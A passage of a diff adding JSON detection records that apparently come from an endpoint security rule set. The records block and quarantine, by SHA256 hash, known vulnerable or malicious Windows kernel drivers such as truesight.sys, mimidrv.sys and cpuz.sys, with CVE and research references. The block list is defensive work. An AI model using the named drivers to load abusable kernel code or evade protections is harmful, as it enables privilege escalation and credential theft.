+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4c0e1bf3b397ebe5105a15dce686d7a171e01d5d4af32d67a8974de55afdf19",
+ "comment": "Vulnerable Kernel Driver (aka ProcObsrvesx.sys) [https://www.loldrivers.io/drivers/8a1a4a5d-3e41-4539-80cd-0cb751f7fab3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "876a4c04-1093-5fb7-836a-867042eb9ce6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476243Z",
+ "creation_date": "2026-03-23T11:45:31.476247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476257Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc2aacf2a7b4759dc416c62215ec054bb5be0578758bf50af6bee4518aaf2da7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "876cf23b-2226-5765-8990-6b5079cac3a9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474513Z",
+ "creation_date": "2026-03-23T11:45:31.474517Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a0b6d3d6f5b0060b7b726aba2be928195eac02d9578bcb7bf0720f1253ea5d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87789c69-186d-55a7-a4eb-d32519aa3a42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143779Z",
+ "creation_date": "2026-03-23T11:45:32.143781Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143787Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52b1c4667ef36a02a0e6d7f147b8d4bc0e30645e6c88bd2984e53abc693bc18e",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87795b7a-f8f5-5a41-a1c3-d04dcb8c2299",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831420Z",
+ "creation_date": "2026-03-23T11:45:30.831422Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831428Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a3114c8a786568a23ac21ae9199a46a87a55e9682e918b0592f8f9fbcb148f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "877c8c2d-b1de-5e45-815a-f03f22f84101",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142862Z",
+ "creation_date": "2026-03-23T11:45:31.142864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d831b59f2940fbe46b818dd685e80930f034b760efad477aa51d55ab67259ac3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8785b208-9372-502a-804f-27e88a73e044",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487106Z",
+ "creation_date": "2026-03-23T11:45:31.487108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487114Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8b755be6751be0ece9e353495220ab5fa3d8f3ea217062a3c74d247e47d07dd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "878b928a-0010-50a6-891f-c4f767faec7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466468Z",
+ "creation_date": "2026-03-23T11:45:30.466471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4b97d63ebdeda6941bb8cef5e94741c6cca75237ca830561f2262034805f0919",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "879b44d9-3e6a-50f0-93df-28fe5327a965",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474615Z",
+ "creation_date": "2026-03-23T11:45:31.474619Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474630Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef5e7e4937163d52f8bbee079c2b72b8f614e7410e2d39fd2ac099e26ad210b6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87a72ab2-2350-56bd-a439-a8a3c215d1f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142808Z",
+ "creation_date": "2026-03-23T11:45:31.142810Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "381ae5f7cace085a6bd7d5eb084e05743195ff7a2c118f7dca7863b56e1e6c0f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87b58a57-1f60-56a9-b382-a745c2279d22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464543Z",
+ "creation_date": "2026-03-23T11:45:30.464546Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31b66a57fae0cc28a6a236d72a35c8b6244f997e700f9464f9cbf800dbf8bee6",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87c94aad-c20e-529c-a314-40d6a61b4276",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499828Z",
+ "creation_date": "2026-03-23T11:45:31.499831Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8f58bf2b14479b8ec6411cae7fd49b723ec191c9037d23266311ef3561c35c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87d2abd8-6bec-5761-9862-0742798dfc3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830223Z",
+ "creation_date": "2026-03-23T11:45:30.830225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "372f0918c7aeba23adbeefcea069a62712c16ce6738fb92905e29c00abf29b6c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87e00e7f-59e8-5dd2-95fb-371a52f4ac09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976052Z",
+ "creation_date": "2026-03-23T11:45:29.976056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976064Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d68410930319a6abf445708b9f7df300289cf9e52489f1701db76116f1ebd6a",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87e3903a-c7ba-5ce5-9cfe-5b71eec930ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811152Z",
+ "creation_date": "2026-03-23T11:45:31.811154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61016707e83776e6e9f5f3468982e3e7c1761d598f73144ae10c7e1bdeb4a5b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "87fd30f0-908e-5f53-a463-dc05fb640735",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618254Z",
+ "creation_date": "2026-03-23T11:45:29.618256Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b715d5682ab59a0ce3f858e47bf79bdf876a899f618c12c22b27cb1dd4daa8f4",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "880bf845-0725-55c6-a5bf-58ed08063a5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487773Z",
+ "creation_date": "2026-03-23T11:45:31.487775Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "648e9acdbcf02ddcc157bbd5c3f85e2126e6f3e960f64477a3cb215c9fb59598",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "881d66cd-13e6-5bd6-b17f-63221ead8ec1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813703Z",
+ "creation_date": "2026-03-23T11:45:31.813705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813711Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2138aada6d7a26cdcdc2781d52228e844866676523a402f2bdd091623e3cea43",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "88209b59-0823-52df-b02f-688d462fa5a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829522Z",
+ "creation_date": "2026-03-23T11:45:31.829524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829530Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c0548e6b0f2d752bb4bd37f3afc8309f5df03adb0c4d21a21f779212b09a1c1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8828ff5b-525c-58e4-a444-81aad999aec5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811787Z",
+ "creation_date": "2026-03-23T11:45:31.811791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d19d90002cf6cf5dcfb3bec1c26c8ca3513e8125cac6e6a260270648c657008d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "882b217e-1f68-535e-8f21-159da5e00e42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984693Z",
+ "creation_date": "2026-03-23T11:45:29.984695Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984701Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd09931d050a354b34731621191795483930bb5f00aa6fba5bb849ea2c89224c",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSB.Sys) [https://www.loldrivers.io/drivers/5938df1d-9513-449f-8252-c442ddca0c2a/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "882e1aee-45ef-5e83-89a6-1c894eba1534",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609650Z",
+ "creation_date": "2026-03-23T11:45:29.609652Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "8830abbd-8d78-5d8e-991c-660edc6ff5f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472214Z",
+ "creation_date": "2026-03-23T11:45:30.472218Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6001c6acae09d2a91f8773bbdfd52654c99bc672a9756dc4cb53dc2e3efeb097",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
